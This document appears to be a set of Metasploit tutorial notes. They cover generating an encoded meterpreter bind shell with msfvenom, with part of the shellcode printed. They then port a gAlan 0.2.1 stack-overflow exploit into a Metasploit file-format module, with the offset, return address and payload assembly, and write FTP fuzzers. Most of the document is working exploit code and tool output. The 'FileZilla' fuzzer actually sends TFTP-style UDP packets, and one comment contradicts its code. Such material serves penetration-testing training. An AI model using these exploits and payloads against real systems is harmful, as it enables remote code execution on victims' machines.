1. working with msfvenom

root@bt:~# msfvenom -h
Usage: /opt/framework/msf3/msfvenom [options] 

Options:
    -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom..
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
    -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, bash..
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       [architecture]  The architecture to use
    -s, --space      [length]        The maximum size of the resulting payload
    -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
    -i, --iterations [count]         The number of times to encode the payload
    -c, --add-code   [path]          Specify an additional win32 shellcode file to include
    -x, --template   [path]          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as..
    -h, --help                       Show this message



root@bt:~# msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3

[*] x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 379 (iteration=3)
buf = 
"\xdb\xdb\xbe\x0a\x3a\xfc\x6d\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x52\x31\x72\x18\x83\xea\xfc\x03\x72\x1e\xd8\x09\xb6" +
"\xce\xc5\x86\x6d\x1a\xa8\xd8\x88\xa8\xbc\x51\x64\xe5\xf2" +
"\xd1\xb7\x80\xed\x66\x72\x6e\x0d\x1c\x68\x6a\xae\xcd\x0e" +
"\x33\x90\x1d\x73\x82\xd8\xd7\xe0\x87\x76\xbd\x25\xf4\x23" +
"\x4d\x38\xc2\xc3\xe9\xa1\x7e\x31\xc5\xe4\x84\x2a\x3b\x37" +
"\xb3\xd6\x13\xc4\x09\x89\xd0\x95\x21\x10\x6b\x83\x94\x3d" +
----------------------------------------------------------------------------

2. Converting exploit to metasploit module

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb

Usage: pattern_create.rb length [set a] [set b] [set c]

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000 



root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 0x234abc 5000

1032


Then, we will define the initialize() function which will contain information about the exploit and also register options:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
        include Msf::Exploit::FILEFORMAT
        def initialize(info = {})
                super(update_info(info,
                        'Name' => 'gAlan 0.2.1 Buffer Overflow Exploit',
                        'Description' => %q{
                    This module exploits a stack overflow in gAlan 0.2.1
                         By creating a specially crafted galan file, an attacker may be able
                         to execute arbitrary code.
            },
                        'License' => MSF_LICENSE,
                        'Author' => [ 'original by Jeremy Brown' ],
                        'Version' => '$Revision: 7724 $',
                        'References' =>
                                [
                                        [ 'URL', 'http://www.exploit-db.com/exploits/10339' ],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload' =>
                                {
                                        'Space' => 1000,
                                        'BadChars' => "\x00\x0a\x0d\x20\x0c\x0b\x09",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform' => 'win',
                        'Targets' =>
                                [
                    [ 'Windows XP Universal', { 'Ret' => 0x100175D0} ],      # 0x100175D0 call esi @ glib-1_3
                                ],
                        'Privileged' => false,
                      
                        'DefaultTarget' => 0))
                        register_options(
                                [
                                        OptString.new('FILENAME', [ false, 'The file name.', 'evil.galan']),
                                ], self.class)
        end

Then, we move ahead and build our buffer. As we have found the position where EIP 
has been overwritten, we can replace the repeated return address value by: 
sploit << rand_text_alpha_upper(1028);
 sploit << [target.ret].pack('V');
Then, we will have to add our nop slide. So that part of the exploit script changes 
to the following line in the module:
sploit << "\x90" * 45
Finally, we build the complete shellcode:
sploit << payload.encoded
Finally, we can combine these lines of script under the exploit() function.
def exploit
                sploit = "Mjik"
                sploit << rand_text_alpha_upper(1028)
                sploit << [target.ret].pack('V')
                sploit << "\x90" * 45
                sploit << payload.encoded
                galan = sploit
                print_status("Creating '#{datastore['FILENAME']}' file ...")
                file_create(galan)
        end
-------------------------------------------------------------------------------

3. Fuzzing with metasploit

msf > use auxiliary/fuzzers/ftp/client_ftp
msf auxiliary(client_ftp) > show options

Module options:

   Name   Current Setting  Required     Description
   ----   ---------------  --------     -----------
  CYCLIC      true         yes       Use Cyclic pattern instead..
  ENDSIZE    200000        yes       Max Fuzzing string size.
  ERROR       false        yes       Reply with error codes only
  EXTRALINE   true         yes       Add extra CRLF's in..
  FUZZCMDS    LIST..       yes       Comma separated list..
  RESET       true         yes       Reset fuzzing values after..
  SRVHOST    0.0.0.0       yes       The local host to listen on.
  SRVPORT     21           yes       The local port to listen on.
  SSL         false        no        Negotiate SSL for incoming..
  SSLVersion  SSL3         no        Specify the version of SSL..
  STARTSIZE   1000         yes       Fuzzing string startsize.
  STEPSIZE    1000         yes       Increment fuzzing string..


msf auxiliary(client_ftp) > run

[*] Server started.
[*] Client connected : 192.168.56.102
[*]  - Set up active data port 20
[*] Sending response for 'WELCOME' command, arg
[*] Sending response for 'USER' command, arg test
[*] Sending response for 'PASS' command, arg test
[*]  - Set up active data port 16011
[*] Sending response for 'PORT' command, arg 192,168,0,188,62,139
[*] Handling NLST command
[*]  - Establishing active data connection
[*]  - Data connection set up
[*] * Fuzzing response for LIST, payload length 1000
[*] (i) Setting next payload size to 2000
[*]  - Sending directory list via data connection
-----------------------------------------------------------------

3. Writing a simple FileZilla FTP fuzzer

The basic template to build a fuzzer will be similar to the one we discussed for the development of an auxiliary module. So our basic template should look as follows:
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Auxiliary::Scanner
        def initialize
                super(
                        'Name'           => 'FileZilla Fuzzer',
                        'Version'        => '$Revision: 1 $',
                        'Description'    => 'Filezilla FTP fuzzer',
                        'Author'         => 'Abhinav_singh',
                        'License'        => MSF_LICENSE
                )
                register_options( [
                Opt::RPORT(14147),
           OptInt.new('STEPSIZE', [ false, "Increase string size each iteration with this number of chars",10]),

            OptInt.new('DELAY', [ false, "Delay between connections",0.5]),
            OptInt.new('STARTSIZE', [ false, "Fuzzing string startsize",10]),
                OptInt.new('ENDSIZE', [ false, "Fuzzing string endsize",20000])
                ], self.class)
        end
So we have imported the MSF libraries, created a class, and defined our options. The next step will be to define the main body of the fuzzer.
def run_host(ip)
                
                udp_sock = Rex::Socket::Udp.create(
                        'Context'   =>
                                {
                                        'Msf'        => framework,
                                        'MsfExploit' => self,
                                }
                )
        startsize = datastore['STARTSIZE'] # fuzz data size to begin with
                count = datastore['STEPSIZE']  # Set count increment
                while count < 10000  # While the count is under 10000 run
                        evil = "A" * count  # Set a number of "A"s equal to count
                        pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00"  # Define the payload
                        udp_sock.sendto(pkt, ip, datastore['RPORT'])  # Send the packet
                        print_status("Sending: #{evil}") 
                        resp = udp_sock.get(1)  # Capture the response
                        count += 100  # Increase count by 10, and loop
                end
        end
end
